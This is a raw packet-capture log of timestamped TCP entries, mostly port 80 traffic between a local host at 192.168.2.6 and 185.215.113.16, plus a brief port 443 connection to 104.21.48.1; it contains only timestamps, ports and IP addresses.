                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.603419065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.603745937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.603785038 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.604469061 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.604509115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.604583979 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.604621887 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606111050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606148958 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606247902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606292009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606853008 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606870890 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606885910 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.606906891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.607815981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.607860088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.608288050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.608329058 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.608880043 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.608922005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.743578911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.743633986 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.743935108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.743973970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.744100094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.744112968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.744142056 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.744155884 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.745187998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.745249033 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.745337009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.745377064 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.746412039 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.746455908 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.746601105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.746640921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.747504950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.747558117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.747690916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.747736931 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.748687029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.748698950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.748730898 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.748747110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.749670029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.749712944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.749969959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.750014067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.750916958 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.750965118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.751051903 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.751099110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.751869917 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.751912117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.752362013 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.752405882 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.753102064 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.753155947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.753669977 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.753712893 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.754091024 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.754132032 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.754595995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.754708052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.755196095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.755260944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.755779028 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.755819082 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757482052 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757493973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757519007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757529974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757534027 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.757572889 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758675098 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758759975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758785963 CET49936443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758832932 CET44349936104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758863926 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758892059 CET49936443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.758924007 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.759341002 CET49936443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.759351015 CET44349936104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.759723902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.759774923 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760123014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760157108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760737896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760782003 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760787010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.760821104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.762021065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.762059927 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.762120962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.762166023 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.763415098 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.763453960 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.763670921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.763712883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.764622927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.764635086 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.764667034 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.764683962 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.765845060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.765892029 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.765970945 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.766010046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.766921997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.766963005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.767318964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.767364025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.768307924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.768327951 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.768353939 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.768378019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.769251108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.769299984 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.769475937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.769521952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.770095110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.770140886 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.770466089 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.770513058 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.770992041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.771033049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.771120071 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.771158934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.772068977 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.772111893 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.772589922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.772639036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.773260117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.773277998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.773298979 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.773313046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.774127960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.774171114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.774909019 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.774949074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.775171041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.775182962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.775208950 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.775223017 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.776290894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.776338100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.776391029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.776437998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.777432919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.777477980 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.777873039 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.777942896 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.778593063 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.778635025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.778707981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.778748035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.779624939 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.779661894 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.779697895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.779735088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.780657053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.780699015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.780764103 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.780800104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.781917095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.781968117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.782002926 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.782047987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.782896042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.782936096 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.782970905 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.783008099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.784090996 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.784133911 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.784173965 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.784250021 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.785070896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.785115957 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.785430908 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.785538912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.786293030 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.786340952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.786762953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.786803961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.787733078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.787774086 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788611889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788661003 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788750887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788765907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788799047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.788821936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.789625883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.789669991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.789788961 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.789832115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.790657997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.790702105 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.790893078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.790936947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.791958094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.792005062 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.792296886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.792341948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.792824984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.792871952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.793011904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.793046951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.793958902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.793998957 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.794365883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.794401884 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.795202017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.795243025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.795325041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.795361042 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.796401024 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.796437979 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.796865940 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.796905041 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.797310114 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.797347069 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.797749043 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.797782898 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.798527956 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.798567057 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.798671961 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.798713923 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.799473047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.799518108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.799598932 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.799634933 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.800724030 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.800764084 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.801173925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.801218987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.801665068 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.801704884 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936243057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936297894 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936568022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936580896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936609983 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936625004 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936630011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.936656952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.937774897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.937820911 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.938029051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.938067913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.938745975 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.938800097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.939488888 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.939527988 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.940047979 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.940090895 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.940397978 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.940442085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.941095114 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.941143990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.941395044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.941442013 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.942243099 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.942284107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.942419052 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.942465067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.943372011 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.943418026 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.943536997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.943574905 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.944389105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.944434881 CET4992380192.168.2.6185.215.113.16
